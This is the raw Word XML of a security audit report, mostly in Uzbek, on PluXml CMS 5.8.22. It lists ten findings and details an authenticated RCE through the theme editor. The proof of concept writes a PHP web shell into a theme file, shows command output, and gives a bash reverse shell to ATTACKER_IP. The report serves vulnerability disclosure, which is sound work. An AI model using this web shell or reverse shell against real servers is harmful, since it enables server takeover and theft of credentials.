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jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLIANCE SECURITY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="666666"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Research Division</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="400"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="C0392B" w:sz="8" w:space="4"/>
          <w:bottom w:val="single" w:color="C0392B" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">PluXml CMS 5.8.22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">FULL SECURITY AUDIT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Target Application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PluXml CMS v5.8.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Audit 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June 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Audit 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White-Box Static Code Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Researcher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Alijonov Alisher | Alliance Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Files Analyzed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373 PHP source files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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Total Findings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10 (1 Critical, 3 High, 3 Medium, 1 Low, 2 Informational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ushbu hisobot PluXml CMS 5.8.22 versiyasining to'liq statik kod tahlili (white-box audit) natijalarini o'z ichiga oladi. 373 ta PHP fayl tahlil qilindi. Jami 10 ta zaiflik aniqlandi: 1 ta Critical, 3 ta High, 3 ta Medium, 1 ta Low va 2 ta Informational/Architectural darajada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Eng jiddiy topilma — autentifikatsiya talab qiladigan RCE (Remote Code Execution) zaifligidir. Admin hisobini qo'lga kiritgan tajovuzkor theme editor orqali serverda istalgan kodni bajarishi mumkin. Bundan tashqari, SVG fayl yuklash orqali Stored XSS va admin panelida Reflected XSS aniqlandi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PluXml ma'lumotlar bazasini ishlatmasligi sababli SQL Injection zaifliklariga yo'l yo'q. LFI/RFI, SSRF va Path Traversal uchun o'rnatilgan himoya mexanizmlari ishlamoqda.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. Zaifliklar Xulosasi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360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>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tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E74C3C" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E67E22" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F1C40F" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="3498DB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">1</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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E74C3C"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">3</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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E67E22"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">3</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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="F1C40F"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">1</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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="3498DB"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">2</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jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2.1. Barcha Zaifliklar Jadvali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60"/>
        <w:gridCol w:w="1500"/>
        <w:gridCol w:w="1200"/>
        <w:gridCol w:w="1600"/>
      </w:tblGrid>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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="44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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerability</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE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Authenticated RCE via Theme Template File Editor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RCE</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980B9"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2022-26965 (related)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SVG Fayl Upload orqali Stored XSS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File Upload + Stored XSS</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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A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Admin Panelida Reflected XSS (GET parametr)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Reflected XSS</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980B9"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2023-43234 (related)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Zaif Parol Xeshlash (MD5+SHA1)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Weak Cryptography</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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A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Brute Force Himoyasi Yetarli Emas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Authentication Bypass (Brute Force)</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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A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Stored XSS via Comment "Site" Maydonida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Stored XSS</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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A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SQL Injection Yo'q — XML Ma'lumot Saqlash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Architecture Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="3498DB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">INFO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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A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8</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SSRF Imkoniyati — GitHub URL Qotib Qolgan (Minimal Risk)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SSRF (Minimal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A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9</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Open Redirect — Autentifikatsiya Sahifasida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Open Redirect</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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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8"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A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Qachon Eski Texnologiya: PHP eval() Hook Tizimida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Code Injection (Plugin Hooks)</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b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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2E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. Test Qilingan Sohalar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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Zaiflik Turi</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Topilma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RCE (Remote Code Execution)</w:t>
            </w:r>
          </w:p>
        </w:tc>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b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TOPILDI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VUL-001: Theme editor orqali admin RCE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XSS (Cross-Site Scripting)</w:t>
            </w:r>
          </w:p>
        </w:tc>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b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TOPILDI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VUL-002, VUL-003, VUL-006: 3 ta vector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SQL Injection</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32"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">YO'Q</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PluXml XML asosida — SQL yo'q</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IDOR</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32"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">YO'Q</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Session-asosli nazorat mavjud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CSRF</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color w:val="795548"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">QISMAN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CSRF token bor, lekin ayrim GET actionlar cheklanmagan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SSRF</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color w:val="795548"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MINIMAL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VUL-008: Hardcoded GitHub URL, user-kontrolsiz</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LFI/RFI</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32"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">YO'Q</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realpath() va checkSource() himoyasi ishlamoqda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Authentication Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>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b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TOPILDI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VUL-005: Zaif brute-force himoyasi</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Privilege Escalation</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color w:val="795548"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MINIMAL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Profil o'zgartirish faqat o'z profil, admin-only funksiyalar to'g'ri himoyalangan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File Upload Vulnerabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>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b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TOPILDI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VUL-002: SVG XSS upload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Weak Cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>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b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TOPILDI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VUL-004: MD5+SHA1 parol xeshlash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Path Traversal</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32"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">YO'Q</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realpath() to'g'ri ishlatilgan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Open Redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>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b/>
                <w:bCs/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TOPILDI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VUL-009: Login redirect parametri</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Code Injection (eval)</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color w:val="795548"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ARXITEKTURA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VUL-010: Plugin hook tizimi eval() asosida</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4. Batafsil Topilmalar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1. Authenticated RCE via Theme Template File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0"/>
        <w:gridCol w:w="7360"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>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tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">[VUL-001] Authenticated RCE via Theme Template File Editor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392B"/>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CVSS Score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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">core/admin/parametres_edittpl.php (PROFIL_ADMIN required)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PluXml admin panelida "Theme Editor" sahifasi (parametres_edittpl.php) autentifikatsiyadan o'tgan administrator foydalanuvchiga mavjud tema fayllarini bevosita tahrirlash imkonini beradi. Tahrir qilinadigan fayllar .php kengaytmali bo'lib, server tomonida PHP sifatida ijro etiladi.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Admin huquqiga ega foydalanuvchi theme editor orqali ixtiyoriy PHP kodni tema fayliga yozib, so'ng shu faylga murojaat qilish yo'li bilan serverdagi istalgan buyruqni bajarishi mumkin.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Asosiy muammo: $_POST['content'] maydoni hech qanday filtrsiz to'g'ridan-to'g'ri faylga yoziladi (plxUtils::write()). Faqat realpath() va preg_match() bilan tema papkasidan tashqariga chiqish oldini olinadi, lekin PHP kodni papka ichiga yozish to'siq yo'q.</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 Server ustida to'liq nazorat (OS command execution)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- /etc/passwd, SSH kalitlari, ma'lumotlar bazasi konfiglari o'qish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Reverse shell yaratish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Boshqa saytlar va tizimlar bilan lateral movement</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">- Butun serverni vayron qilish imkoniyati</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Muhimlik: Autentifikatsiya talab qilinadi (PROFIL_ADMIN), lekin buning o'zi exploit'ni unchalik qiyinlashtirmaydi chunki zaif parol, sessiya o'g'irlash yoki boshqa zaiflik bilan kombinatsiya qilish mumkin.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PoC /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1. Admin sifatida kirish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Apparence &gt; Themes &gt; Edit current theme &gt; home.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. Faylga quyidagini yozish:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;?php echo shell_exec($_GET['cmd']); ?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Faylni saqlash (POST: tpl=home.php&amp;content=&lt;?php ...&gt;&amp;submit=1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5. Saytga murojaat: http://target.com/?home&amp;cmd=id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Natija: uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reverse shell uchun:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Content: &lt;?php system("bash -c 'bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1'"); ?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="8E44AD"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  Natija: interaktiv shell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 Theme editor funksiyasini faqat super-admin uchun cheklash yoki butunlay o'chirish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
